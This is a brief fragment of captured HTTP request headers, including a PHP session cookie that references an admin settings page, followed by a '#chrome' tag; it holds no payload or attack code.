    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: revenue[LastUrl]=%2Frates%2Fadmin%2Fsystem_settingslist.php; PHPSESSID=k7m8rkajvoev3rcu6g7qup0660
    Connection: close

Tag

#chrome